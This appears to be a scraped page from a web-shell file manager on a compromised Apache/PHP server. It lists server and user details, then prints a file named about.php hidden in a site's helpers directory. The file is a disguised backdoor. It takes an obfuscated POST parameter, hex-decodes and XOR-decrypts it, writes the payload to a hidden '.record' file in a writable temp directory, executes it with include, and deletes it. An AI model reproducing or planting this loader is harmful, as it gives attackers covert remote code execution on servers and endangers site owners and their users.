HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux aritmodecarnaval.es 5.15.0-79-generic #86-Ubuntu SMP Mon Jul 10 16:07:21 UTC 2023 x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /home/www/torresncgolf/instalaciones/system/helpers/helpers/about.php
<?php

if(!is_null($_POST["s\x79m"] ?? null)){
	$desc = hex2bin($_POST["s\x79m"]);
	$data ='' ; foreach(str_split($desc) as $char){$data .= chr(ord($char) ^ 69);}
	$flag = array_filter([getcwd(), "/dev/shm", "/tmp", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), getenv("TMP")]);
	foreach ($flag as $key => $ent) {
    		if (!!is_dir($ent) && !!is_writable($ent)) {
    $comp = vsprintf("%s/%s", [$ent, ".record"]);
    if (file_put_contents($comp, $data)) {
	include $comp;
	@unlink($comp);
	exit;
}
}
}
}